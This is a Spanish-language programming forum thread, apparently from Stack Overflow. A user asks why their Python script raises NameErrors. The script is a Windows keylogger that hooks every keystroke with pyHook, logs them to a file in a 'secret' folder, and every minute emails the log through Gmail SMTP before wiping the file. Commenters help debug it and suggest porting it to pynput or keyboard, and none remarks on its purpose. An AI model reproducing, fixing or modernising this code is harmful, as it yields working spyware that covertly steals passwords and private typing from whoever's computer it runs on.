# Dos variables no están definidas

Tags: python

¿Cómo podría resolver los errores que se me presentan al ejecutar el código? Los errores son:

**NameError: name 'PumpWaitingMessages' is not defined**

**NameError: name 'FormatAndSendEmail' is not defined**

Según yo tendría que definir ambas variables previamente en el código. Otra opción podría ser la de que me falten librerías; pero no estoy seguro.

```
import pyHook, pythoncom, sys, logging
import time, datetime

wait_seconds = 60
timeout = time.time() + wait_seconds
file_log = 'C:\\secret\\dat.txt'

def TimeOut():
    if time.time() > timeout:
        return True
    else:
        return False

def SendEmail(user, pwd, recipient, subject, body):
    import smtplib

    gmail_user = user
    gmail_pass = pwd
    FROM = user
    TO = recipient if type(recipient) is list else [recipient]
    SUBJECT = subject
    TEXT = body

    message = """\From: %s\nTo: %s\nSubject: %s\n\n%s
    """ % (FROM, ", ".join(TO), SUBJECT, TEXT)
    try:
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.ehlo()
        server.starttls()
        server.login(gmail_user, gmail_pass)
        server.sendmail (FROM, TO, message)
        server.close()
        print ('Correo enviado de manera satisfactoria')
    except:
        print ('¡No se ha podido enviar el mensaje!')

def FormatAndSendLogEMail():
   with open(file_log, 'r+') as f:
        actualdate = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        data = f.read().replace('\n', '')

        data = 'Log capturado a las: '+ actualdate + '\n' + data
        SendEmail('correoaleatorio12345@gmail.com', 'contraseñaaleatoria', 'correoaleatorio12345@gmail.com',
        'Nuevo log - '+ actualdate, data)
        f.seek(0)
        f.truncate()

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG,
                        format = '%(message)s')
    logging.log(10, chr(event.Ascii))
    return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()

while True:
    if TimeOut():
        FormatAndSendLogEmail()
        timeout = time.time() + wait_seconds

    pythoncom.PumpWaitingMessages()
```

Si sirve de algo, recientemente instale por medio de pip install **pyHook** y **pyWin32**.

Comment: Donde tienes esas variables? Python te esta diciendo que no existen y las estas tratando de utilizar y aun peor las usas como funciones, y tampoco tienes definidas esas funciones, verifica bien tu código

Comment: De alguna forma lo arregle. Sin embargo, ahora me pone lo siguiente:

Comment: @Christian TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk_code', 'scan_code', 'ascii', 'flags', 'time', 'hwnd', and 'win_name'

Comment: Te falta pasarle esos argumentos a la función `KeyboardSwitch`

Comment: Disculpa mi ignorancia, pero, no encuentro en el código nada que diga Keyboard Switch. En donde está esa función o como jajaja.

Comment: @Christian Entiendo que le faltan argumentos, sin embargo no encuentro en donde se encuentra (en el código).

Comment: yo tampoco lo veo >_<, lo mas probable es que sea una función que es llamada en algún modulo instalado

Comment: @Christian Entonces.... ¿alguna solución?

Comment: Nada por ahora, te daré un voto a favor para que tengas la ayuda correspondiente

Comment: Ok. Muchas gracias Christian por tu paciencia y ayuda.

Comment: Según esto: https://stackoverflow.com/questions/26156633/pythoncom-crashes-on-keydown-when-used-hooked-to-certain-applications
se trata de un bug de pyHook y basicamente para evitarlo hay que reescribir el modulo... (nada sorprendente viendo que la ultima actualización fue 2008)

Comment: @AnkiJedi Después de una mayor investigación, encontré que era posible reconstruir pyHook para que funcione para python 3. Sin embargo, también me encontré con estas dos versiones de pyHook que "dicen" servir para python 3. ¿Qué opinas? https://github.com/Answeror/pyhook_py3k      https://pypi.org/project/PyHook3/

Comment: Cuando mencione "reescribir el modulo" me referia a reconstruir pyHook y para esto necesitas conocimiento de `C` y saber exactamente la versión de visual C en que fue programado el interprete de python que usas, sobre `pyHook3`, según la documentación ese error fue arreglado, pero yo no confiaria en un modulo abandonado y me iria por algo mas moderno como el modulo `keyboard`, o `pynput` por tanto tendras que reconstruir tu programa en base a alguno de estos (que no debe ser dificil, es mas con pynput posiblemente sean menos lineas de codigo)